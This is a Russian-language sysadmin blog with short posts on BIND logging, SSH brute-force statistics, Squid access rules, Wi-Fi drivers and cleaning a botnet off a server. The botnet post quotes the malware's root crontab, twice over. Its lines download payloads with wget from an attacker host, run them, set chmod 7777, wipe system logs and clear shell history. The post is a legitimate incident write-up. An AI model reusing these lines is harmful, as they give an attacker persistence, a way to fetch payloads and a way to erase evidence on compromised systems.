Заметки на breys.ru

отключение журналов bind9

ffsdmad@jabber.ru ( Басманов ) — Tue, 12 Aug 2014 18:40:59 +0400

Нет ничего удивительного в использовании на домашнем компьютере собственного DNS сервера, так это экономит траффик, ускоряет запросы к сайтам, позволяет организовывать удобную домашную сеть с вайфаем и шарами, но весьма удивительно позволять настроенному DNS серверу писать свои сообщения в общесистемные журналы, потому что этот сервер весьма болтливый. Вот например анализ моего syslog, накопленный за 6 дней:

cat /var/log/syslog|sed 's/\[/ /g'|awk '{print $5}'|sort| uniq -c|sort -n

      1 avahi-daemon
      4 dbus
      7 rsyslogd:
     14 acpid:
     14 NetworkManager
     15 anacron
     15 pppd
     31 CRON
     48 dhcpd:
    679 kernel:
   1982 named

тут сразу видно, что каждые два из трёх сообщения произносится DNS сервером. Думаю на домашнем сервере можно просто напросто отключить логирование DNS, ну или перенаправить в отдельные файлы

Для отключения журналирования события BIND9 достаточно добавит опцию

querylog false;

в раздел options файла /etc/bind/named.conf.options

Двадцатка самых популярных имён пользователей при взломе серверов

ffsdmad@jabber.ru ( Басманов ) — Fri, 18 Jul 2014 10:02:29 +0400

Наблюдая за серверами и учитывая, что практически ежеминутно на каждый сервер, доступный в инетернете, происходит атака подобора пароля, очень интересно наблюдать за этими злодействиями в системных журналах. Достаточно применить вот такой простой фильтр чтобы отобрать из журнала авторизации все неудачные попыки подключения к серверу

sudo grep ssh /var/log/auth.log |grep 'Invalid user'|awk '{print $8}'|sort|uniq -c|sort -rn|head -20

    418 admin
    160 oracle
     71 postgres
     64 test
     62 nagios
     31 support
     31 git
     29 user
     27 teamspeak
     25 minecraft
     24 sandeep
     23 jenkins
     19 ftpuser
     17 web
     17 mythtv
     17 hadoop
     16 webmaster
     16 sanjay
     16 guest
     15 vnc

Тут видно, что при всём богатстве выбора имён для OS пользователей сервера, злочинцы довольно часто используют имена созвучные с названием служб котоые могут быть запущены на сервере, например при создании git репозитария кажется логичным создать и пользователя git, так же с vnc, postgres и тд., но не имея возможность знать имена пользователей ОС сервера, расчитывауют использовать эту беспечность и подобрать пароль. По сути они напоминают взломщиков, которые перебирая свои отмычки вынуждены их постоянно подпиливать и пробовать снова.

Для того чтобы обезопасить себя от этих злочинцев необходимо как минимум сделать две вещи:

Запретить логин root пользователя на сервер, добавив такую опцию в /etc/ssh/sshd_config

PermitRootLogin without-password
Установить и настроить службу слежения за подключениями и блокировкой неудачников в фаерволе
aptitude search deny
i denyhosts

Rcnfnb

Кстати, на серверах которые дольше всех использует denyhosts, постоянно подключены к сети и имеют статический адрес количество подобных атак в разы меньше

sudo grep ssh /var/log/auth.log* |grep 'Invalid user'|awk '{print $8}'|sort|uniq -c|sort -rn| head 
     25 admin
      8 test
      6 support
      4 ghost
      3 ubnt
      3 pi
      3 ashish
      3 arun
      3 aman
      3 ajay

Видимо злочинцы осознанно сканируют сети динамических адрес в поисках серверов админов в махеровых халатах

Настройка inotify для работы с большими файловыми системами

ffsdmad@jabber.ru ( Басманов ) — Tue, 08 Jul 2014 16:23:33 +0400

Бибилиотека pyinotify очень полезна и удобна создания различных обработчиков событий происходящих в файловой системе.

Но если вам захочется отслеживать постоянно растущую домашнюю директорию, то вы получите следующие ошибки при запуске монитора:

[2014-07-08 15:50:58,980 pyinotify ERROR] add_watch: cannot watch /home/ffsdmad/.warzone2100-3.1/savegames/skirmish WD=-1, Errno=No space left on device (ENOSPC)
[2014-07-08 15:50:58,980 pyinotify ERROR] add_watch: cannot watch /home/ffsdmad/.warzone2100-3.1/maps WD=-1, Errno=No space left on device (ENOSPC)
[2014-07-08 15:50:58,980 pyinotify ERROR] add_watch: cannot watch /home/ffsdmad/.warzone2100-3.1/music WD=-1, Errno=No space left on device (ENOSPC)
[2014-07-08 15:50:58,980 pyinotify ERROR] add_watch: cannot watch /home/ffsdmad/.warzone2100-3.1/logs WD=-1, Errno=No space left on device (ENOSPC)

Такое необъяснимое поведение библиотеки объясняется дефолтными настройками ядра, которое по умолчанию позволяет простому пользователю создавать всего 629145 наблюдателей(watches)

sysctl | grep max_user_watches

Доведите это число до нужного вам и всё будет работать

sysctl fs.epoll.max_user_watches=1658859

Squid ограничение доступа по времени

ffsdmad@jabber.ru ( Басманов ) — Fri, 04 Jul 2014 11:17:02 +0400

Когда надо ограничить доступ по времени, например к социальным сетям, необходимо добавить в настройки прокси сервера следующие опции:

создать файл /etc/squid/block_soc_net.txt со списком ограничиваемых ресурсов

facebook.com
liveinternet.ru
livejournal.com
mamba.ru
my.mail.ru
odnoklassniki.ru
twitter.com
vk.com

Добавить новые ACL:

acl bad_soc_net url_regex -i "/etc/squid/block_soc_net.txt"
acl OBED time 12:00-13:00

Добавить новое правило запрещающее ВСЕМ обращаться к адресам из составленного списка в любое время кроме ОБЕДА:

http_access deny !OBED bad_soc_net all

А следом, для информативности, добавить правило направляющее на внутренную страницу с поясняющим сообщением

deny_info http://work.a/page958.html all

После перезапуска squid всё будет работать

Удаление ботнета sfewfesfs

ffsdmad@jabber.ru ( Басманов ) — Wed, 02 Jul 2014 13:17:53 +0400

Недавно достался на обслуживание старенький сервер, в ходе работы которого регулярно возникали проблемы с раздачей интернета через прокси. В ходе разбирательств выяснилось, что сервер учавствует в ботнете, проявлялось это в следующем:

в списке процессов висел процесс /etc/sfewfesfs и /etc/.SSH

крайне большой для этого сервера исходящий траффик

eth1: Jun ཊ 18.97 GiB / 145.58 GiB / 164.55 GiB

статистика использовать внешнего интерфейса при участии компьютера в ботнете

постоянное ssh соединие с китайским адресом из 116.10.191.0/24

Зараза скорее всего попала следующим образом:

раньше сервер находился за натом своего ADSL модема, имел крепкие пароли на модеме, но слабые пароли на самом сервере. Через несколько лет, после перезаключение ADSL договора им заменили модем, на которым до недавнего времени были настройки по умолчанию, то-есть всем известный логин/пароль админ/админ. При этом кто-то из предыдущих админов пробрасывал 22 порт на сервер и биндил модем на dyndns.org. Таким образом достаточно было в ходе сканирования зайти на ssh сервер с простым паролем root и установить всё что нужно.

Работает бакдор следующим образом:

в cron пользователя root (/var/spool/cron/crontabs/root) записывается много правил, которые регулярно обновляют вирус

*/100 * * * * nohup /etc/sdmfdsfhjfe > /dev/null 2>&1&
*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/dsfrefr
*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/gfhjrtfyhuf
*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/sfewfesfs
*/120 * * * * cd /root;rm -rf dir nohup.out
*/130 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/gfhddsfew
*/130 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/sdmfdsfhjfe
*/140 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/ferwfrre
*/140 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/rewgtf3er4t
*/1 * * * * cd /etc;rm -rf dir dsfrefr.*
*/1 * * * * cd /etc;rm -rf dir ferwfrre.*
*/1 * * * * cd /etc;rm -rf dir gfhddsfew.*
*/1 * * * * cd /etc;rm -rf dir gfhjrtfyhuf.*
*/1 * * * * cd /etc;rm -rf dir rewgtf3er4t.*
*/1 * * * * cd /etc;rm -rf dir sdmfdsfhjfe.*
*/1 * * * * cd /etc;rm -rf dir sfewfesfs.*
*/1 * * * * cd /root > .bash_history
*/1 * * * * cd /var/log > access-log
*/1 * * * * cd /var/log > aculog
*/1 * * * * cd /var/log > anaconda.log
*/1 * * * * cd /var/log > cups
*/1 * * * * cd /var/log > daemon.log
*/1 * * * * cd /var/log > dpkg.log
*/1 * * * * cd /var/log > faillog
*/1 * * * * cd /var/log > kern.log
*/1 * * * * cd /var/log > lastlog
*/1 * * * * cd /var/log > maillog
*/1 * * * * cd /var/log > messages
*/1 * * * * cd /var/log > secure
*/1 * * * * cd /var/log > spooler
*/1 * * * * cd /var/log > sudolog
*/1 * * * * cd /var/log > user.log
*/1 * * * * cd /var/log > utmp
*/1 * * * * cd /var/log > wtmp
*/1 * * * * cd /var/log > Xorg.x.log
*/1 * * * * cd /var/log > yum.log
*/1 * * * * chmod 7777 /etc/dsfrefr
*/1 * * * * chmod 7777 /etc/ferwfrre
*/1 * * * * chmod 7777 /etc/gfhddsfew
*/1 * * * * chmod 7777 /etc/gfhjrtfyhuf
*/1 * * * * chmod 7777 /etc/rewgtf3er4t
*/1 * * * * chmod 7777 /etc/sdmfdsfhjfe
*/1 * * * * chmod 7777 /etc/sfewfesfs
*/1 * * * * history -c
*/1 * * * * killall -9 32
*/1 * * * * killall -9 64
*/1 * * * * killall -9 b26
*/1 * * * * killall -9 codelove
*/1 * * * * killall -9 DDosl
*/1 * * * * killall -9 freeBSD
*/1 * * * * killall -9 .IptabLes
*/1 * * * * killall -9 lengchao32
*/1 * * * * killall -9 new4
*/1 * * * * killall -9 new6
*/1 * * * * killall -9 nfsd
*/1 * * * * killall -9 nfsd4
*/1 * * * * killall -9 node24
*/1 * * * * killall -9 profild.key
*/360 * * * * cd /etc;rm -rf dir dsfrefr
*/360 * * * * cd /etc;rm -rf dir ferwfrre
*/360 * * * * cd /etc;rm -rf dir gfhddsfew
*/360 * * * * cd /etc;rm -rf dir gfhjrtfyhuf
*/360 * * * * cd /etc;rm -rf dir rewgtf3er4t
*/360 * * * * cd /etc;rm -rf dir sdmfdsfhjfe
*/94 * * * * killall -9 dsfrefr
*/95 * * * * killall -9 ferwfrre
*/96 * * * * killall -9 rewgtf3er4t
*/97 * * * * killall -9 sdmfdsfhjfe
*/98 * * * * killall -9 gfhjrtfyhuf
*/99 * * * * killall -9 sdmfdsfhjfe
*/99 * * * * nohup /etc/gfhjrtfyhuf > /dev/null 2>&1&
*/99 * * * * nohup /etc/sfewfesfs > /dev/null 2>&1&
*/100 * * * * nohup /etc/sdmfdsfhjfe > /dev/null 2>&1&
*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/dsfrefr
*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/gfhjrtfyhuf
*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/sfewfesfs
*/120 * * * * cd /root;rm -rf dir nohup.out
*/130 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/gfhddsfew
*/130 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/sdmfdsfhjfe
*/140 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/ferwfrre
*/140 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/rewgtf3er4t
*/1 * * * * cd /etc;rm -rf dir dsfrefr.*
*/1 * * * * cd /etc;rm -rf dir ferwfrre.*
*/1 * * * * cd /etc;rm -rf dir gfhddsfew.*
*/1 * * * * cd /etc;rm -rf dir gfhjrtfyhuf.*
*/1 * * * * cd /etc;rm -rf dir rewgtf3er4t.*
*/1 * * * * cd /etc;rm -rf dir sdmfdsfhjfe.*
*/1 * * * * cd /etc;rm -rf dir sfewfesfs.*
*/1 * * * * cd /root > .bash_history
*/1 * * * * cd /var/log > access-log
*/1 * * * * cd /var/log > aculog
*/1 * * * * cd /var/log > anaconda.log
*/1 * * * * cd /var/log > cups
*/1 * * * * cd /var/log > daemon.log
*/1 * * * * cd /var/log > dpkg.log
*/1 * * * * cd /var/log > faillog
*/1 * * * * cd /var/log > kern.log
*/1 * * * * cd /var/log > lastlog
*/1 * * * * cd /var/log > maillog
*/1 * * * * cd /var/log > messages
*/1 * * * * cd /var/log > secure
*/1 * * * * cd /var/log > spooler
*/1 * * * * cd /var/log > sudolog
*/1 * * * * cd /var/log > user.log
*/1 * * * * cd /var/log > utmp
*/1 * * * * cd /var/log > wtmp
*/1 * * * * cd /var/log > Xorg.x.log
*/1 * * * * cd /var/log > yum.log
*/1 * * * * chmod 7777 /etc/dsfrefr
*/1 * * * * chmod 7777 /etc/ferwfrre
*/1 * * * * chmod 7777 /etc/gfhddsfew
*/1 * * * * chmod 7777 /etc/gfhjrtfyhuf
*/1 * * * * chmod 7777 /etc/rewgtf3er4t
*/1 * * * * chmod 7777 /etc/sdmfdsfhjfe
*/1 * * * * chmod 7777 /etc/sfewfesfs
*/1 * * * * history -c
*/1 * * * * killall -9 32
*/1 * * * * killall -9 64
*/1 * * * * killall -9 b26
*/1 * * * * killall -9 codelove
*/1 * * * * killall -9 DDosl
*/1 * * * * killall -9 freeBSD
*/1 * * * * killall -9 .IptabLes
*/1 * * * * killall -9 lengchao32
*/1 * * * * killall -9 new4
*/1 * * * * killall -9 new6
*/1 * * * * killall -9 nfsd
*/1 * * * * killall -9 nfsd4
*/1 * * * * killall -9 node24
*/1 * * * * killall -9 profild.key
*/360 * * * * cd /etc;rm -rf dir dsfrefr
*/360 * * * * cd /etc;rm -rf dir ferwfrre
*/360 * * * * cd /etc;rm -rf dir gfhddsfew
*/360 * * * * cd /etc;rm -rf dir gfhjrtfyhuf
*/360 * * * * cd /etc;rm -rf dir rewgtf3er4t
*/360 * * * * cd /etc;rm -rf dir sdmfdsfhjfe
*/94 * * * * killall -9 dsfrefr
*/95 * * * * killall -9 ferwfrre
*/96 * * * * killall -9 rewgtf3er4t
*/97 * * * * killall -9 sdmfdsfhjfe
*/98 * * * * killall -9 gfhjrtfyhuf
*/99 * * * * killall -9 sdmfdsfhjfe
*/99 * * * * nohup /etc/gfhjrtfyhuf > /dev/null 2>&1&*/99 * * * * nohup /etc/sfewfesfs > /dev/null 2>&1&

Таким образом первым делом необходимо удалить правила кронтаба, затем прибить все указанные процессы и удалить используемые им файлы.

Ну а на последок, мне кажется, что надёжнее всего переустановить дистрибутив

Установка WiFi карты D-Link DWA-525 в Ubuntu 10.04

ffsdmad@jabber.ru ( Басманов ) — Mon, 13 Jan 2014 18:44:53 +0400

Намаявшись с Marvel 8335 (геморой с win драйверам и ndiswrapped, а так же нестабильность работы в целом, вплоть до зависаний ядра), а так же с TP-Link TL-WN751ND (вроде ядро 3.3.1 на ходу определяет, но регулярно разрывается связь)

Приобрёл D-Link DWA-525, ядро сам не определило устройство, пришлось ставить руками

sudo -i


# нужно запретить загрузку почти одноимённого и не подходящего драйвера


echo blacklist rt2800pci >> /etc/modprobe.d/blacklist.conf

# на случай, если он всё таки загрузился, нужно выгрузить драйвер и для этого не обязательно перезагружаться


modprode -r rt2800pci


mkdir DWA-525


cd DWA-525


# скачиваем исходники дайвера с сайта D-Link 


mkdir ~/DWA-525 


cd ~/DWA-525/ 


wget -c http://ftp.dlink.ru/pub/Wireless/DWA-525/Drivers/Linux/rev.A2/LinuxSTA_v2.6.1.0_1.7z


# распечатываем 7z архив 

7z x LinuxSTA_v2.6.1.0_1.7z 

# собираем и устанавливаем драйвер из исходников, должен быть установлен пакет с заголовками ядра и build-essential 

cd LinuxSTA_v2.6.1.0_1/DWA-525_A2_LinuxSTA_V2.6.1.0_1/ 


make && make install


# теперь можно загрузить драйвер и проверить


modprode rt5592sta 

dmesg |tail -20 

ifconfig -a 


файл драйвера находится в

ls /lib/modules/`uname -r`/kernel/drivers/net/wireless/rt5592sta.ko

после этого вроде бы всё работает так и должно работать в линуксе, разве что выхлоп dmesg теперь будет содержать отладочную информацию от драйвера, очевидно до тех пока его не включат в общее ядро

Если утром не запустился squid

ffsdmad@jabber.ru ( Басманов ) — Fri, 20 Dec 2013 09:38:16 +0400

Заглянув в кальмарий живой журнал я обнаружил удивительную заметку

tail -f /var/log/squid/cache.log
logfileOpen: opening log /var/log/squid/access.log
logfileOpen (stdio): /var/log/squid/access.log: (28) No space left on device
FATAL: logfileOpen: path /var/log/squid/access.log: couldn't open!

кальмар сообщал, что не способен создать новый файл журнала потому что на смонтированном разделе закончилось место, вот только верный df сообщал, что места хватает

df -h
/dev/sda2              28G   19G  7,7G  71% /var

не веря свои глазам я проверил лимит файлов на смонтированном разделе и о радость -- оказалось, что за два года наш кальмар наполнил свою ночную вазу до края

df -i
/dev/sda2            1835008 1835008       0  100% /var

ну а далее все просто - нужно сделать промывание

rm -fR /var/spool/squid/*
squid -z
chown -R proxy:proxy /var/spool/squid/
service squid start

Защита resolve.conf от перезаписи при подключении по dhcp

basmanova@jabber.ru ( katya ) — Mon, 16 Dec 2013 22:28:42 +0400

Может статься, что у вас настроен собственный кеширующий DNS сервер и модемное подключение по GPRS или WiFi, а настройки интерфейса выдаёт провайдер под DHCP, в этом случае файл /etc/resolve.conf будет перезаписываться при каждом подлючении, забывая про ваш полезный DNS сервер с его большим кешем адресов и собственным зонами

Наверно самым элегантным решением будет поднастроить dhcp клиента, а для этого необходимо в файле /etc/dhcp3/dhclient.conf указать свои настройки

supersede domain-name "xxx";


prepend domain-name-servers 127.0.0.1;

Вот и всё, теперь после каждого запуска DHCP клиент будет применять все параметры, провайдера кроме переопределённых в его настройках

Wi-Fi-роутер TP-Link TL-MR3020

ffsdmad@jabber.ru ( Басманов ) — Tue, 03 Dec 2013 10:18:45 +0400

Купил 3G WiFi роутер для раздачи интернета в лесу, его можно подключить к USB выходу компа или к розетке через адаптер. Через ethernet порт устройство выдаёт по dhcp адрес и находится по адресу http://192.168.0.254 логин и пароль по умолчанию admin

Целесообразно сразу установить новую прошивку, скачав её от сюда, распоковав и закачав в роутер через вебинтерфейс управления

Затем, нужно настроить параметры точки доступа SSID и пароль для WPA2 идентификации. Отлично работает с модемом Huawei E173

После включения требуется примерно минута на подключение мегафон модема и устройство работает как часы

Ubuntu 12.04 установка WiFi card Marvel 8335

ffsdmad@jabber.ru ( Басманов ) — Sat, 09 Nov 2013 16:55:21 +0400

Если у вас 64 битное ядро и ваша lspci |grep Wireless выдаёт

03:02.0 Ethernet controller: Marvell Technology Group Ltd. 88w8335 [Libertas] 802.11b/g Wireless (rev 03)

значит у вас проблемы -- производитель вашей карточки не поддержал вас драйверами к ней и ваш список сетевых интерфейсов не содержит заветной wlan0

Но это поправимо потому что в Linux есть возможность установки драйверов от ос Windows -- Ndiswrapper, устанавливаем ndiswrapper и графическую утилиту ndisgtk к ней

aptitude install ndiswrapper ndisgtk

Скачиваем драйвера к 88w8335 от Windows XP x64

Распечатываем архив, указываем на полученный файл mrv8335x64.inf либо с помощью ndisgtk либо с помощью

ndiswrapper -i mrv8335x64.inf

Вроде бы всё